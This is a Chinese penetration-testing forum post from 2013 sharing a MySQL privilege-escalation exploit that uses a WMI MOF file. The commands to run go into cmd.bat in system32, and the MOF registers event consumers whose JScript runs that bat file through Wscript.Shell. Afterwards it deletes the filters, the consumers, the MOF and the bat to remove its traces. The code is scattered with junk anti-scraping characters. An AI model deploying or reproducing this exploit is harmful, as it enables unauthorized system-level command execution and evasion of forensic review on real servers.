中国网络渗透测试联盟

标题: Mysql 提权即时无错Mof exp [打印本页]
作者: admin    时间: 2013-2-14 00:05
标题: Mysql 提权即时无错Mof exp
这个sql提权MOF需要运行 system下的文件,不能定义路径。- I3 h) Z% q$ X' Q) }
需要将要运行的命令写入到bat上传到system32目录,然后执行。
; x, a2 g7 I, J: ?
  D; x' g+ F% {7 O0 P+ h这个sql提权MOF需要运行 system下的文件,不能定义路径。7 K& Y2 w7 j% i+ z1 O
需要将要运行的命令写入到bat上传到system32目录,然后执行。
9 T5 |2 z  b% n0 f) h+ c' n7 A, \  a  `- C
#pragma
" Q+ n8 m; R7 o3 M5 F" Z; s                        namespace("\\\\.\\root\\cimv2")
9 ~% a+ l' |" _1 Q# @4 l5 a                        class
" B$ a* D1 c+ L0 x- y& H! Z                        MyClass5471 j/ N3 R  Q4 Y9 G7 F
                        {           [key]
* |* R% F: _9 @/ o1 e5 h- h- M3 g( |- j                        string" F! z% Z! {# m+ c" ?, o! V8 C1 e
                        Name;
; S4 R2 A" d9 q                        };7 y# D  V: w8 \+ u/ _6 m  B
                        class! d& ?1 N" }# n' P! W) U0 i
                        ActiveScriptEventConsumer
+ J& V! d, ?' k; w% z7 B                        : __EventConsumer {          [key]" J( ]) f7 @6 {0 E1 z) r8 D" ^0 ?7 {6 u5 q
                        string& z. q. r; x8 k3 L( x+ r
                        Name;           [not_null]; z( ?6 A  ^" _" f
                        string* j9 `. ^1 v: t; a& B* r) d
                        ScriptingEngine;           string
4 D+ n) x9 i  D) ?2 L                        ScriptFileName;           [template]
% E+ q* e+ C8 K8 ?" F' Y/ i8 u                        string
1 j. v. F) l) C! }                        ScriptText;         uint32 KillTimeout;) n2 l7 z+ e, S" \! y
                        }; instance of __Win32Provider as $P {
2 q" A1 F: ~+ E& I- Z5 Q2 L2 T                        Name$ w& v5 D1 `3 m% ?
                        =& H) W1 \8 J% q; I+ \' |
                        "ActiveScriptEventConsumer";     CLSID =
; J8 I/ X; S4 @8 C, ~                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
  d' ?( \. }$ L9 b' M! e9 j                        PerUserInitialization5 _7 Y  C7 f- e5 s+ ~& s, z3 w
                        = TRUE;
# m  l9 c# n& h" i7 `                        }; instance of __EventConsumerProviderRegistration {         Provider
: q* |3 j$ w9 P, T5 J                        = $P;         ConsumerClassNames8 B9 U. j( `' `  n
                        =, f- E# m& j! |. T( ^
                        {"ActiveScriptEventConsumer"};5 [& `$ w+ y& O& c9 l% Z0 R
                        };1 w5 C" j, T+ t0 O) T7 ?
                        Instance of ActiveScriptEventConsumer
; o' e% Z% x: M% o3 s                        as $cons {         Name
/ d: D% t! N6 _) b                        =. t( M& k1 w( w% u% b
                        "ASEC";         ScriptingEngine( Q; a" `1 K. p' z# i3 s7 o
                        =
8 \: `1 R3 T( _% y' O# F                        "JScript";         ScriptText& [2 l7 \/ G+ v5 o
                        =$ y$ m9 O& A2 O- x) g  @7 q. D
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };3 ?# k8 p, u/ k. v, H: {
                        Instance of ActiveScriptEventConsumer( P0 u/ F5 @+ Y% U* ^
                        as $cons2 {         Name
" {: r: V& c# g& p( S                        =3 J, B& D3 Z5 {& d
                        "qndASEC";         ScriptingEngine
* ]8 Y' T& }# [: }( Y                        =& N3 T+ ~) c2 M) H0 q) m
                        "JScript";         ScriptText! j4 A5 f9 Q$ N  T2 R( E
                        =
3 v- ?8 l0 t" H6 _/ i5 f' p8 V8 r                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";: l$ w- {4 o# M
                        }; instance of __EventFilter as $Filt {         Name
1 E9 ]! N" N, [) ]# X4 k                        =
9 m: D. L3 B  n* K* g                        "instfilt";         Query
2 }: E+ t$ [7 T; n2 v- K                        =9 w& ~" Y( K' p0 |# B
                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
% j. X/ ]: a  ~# l! ]- z5 n                        =
; N% e4 ?: u* s1 a' O0 }                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name- P. T3 N# b9 B+ L. e
                        =8 h5 Y: u$ }% p% }9 k
                        "qndfilt";         Query# h- ]5 M6 X, n' n( {
                        =0 y0 k3 Z* D0 `* y' f
                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
* P$ M# g0 c- [" o' d7 U3 ]                        =" c0 U; I: C, C
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer/ G4 r; G0 D. P# x7 g  |0 w
                        = $cons;         Filter
$ {  [8 _8 V7 X$ o" m' z                        = $Filt;2 I' [3 W  K. [& S; y
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer6 C9 p5 v7 S  @. P. _! G
                        = $cons2;         Filter$ y7 `% G+ G- ^% C
                        = $Filt2;
/ [7 V5 i# ?: O4 |                        }; instance of MyClass5472 B  I6 ~; e. U' O
                        as $MyClass {         Name) \9 u6 L& ^' P! a
                        =
. b. Z' F, X" s                        "ClassConsumer";
+ y5 e% L/ M( e+ i+ C1 v* R                        };



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2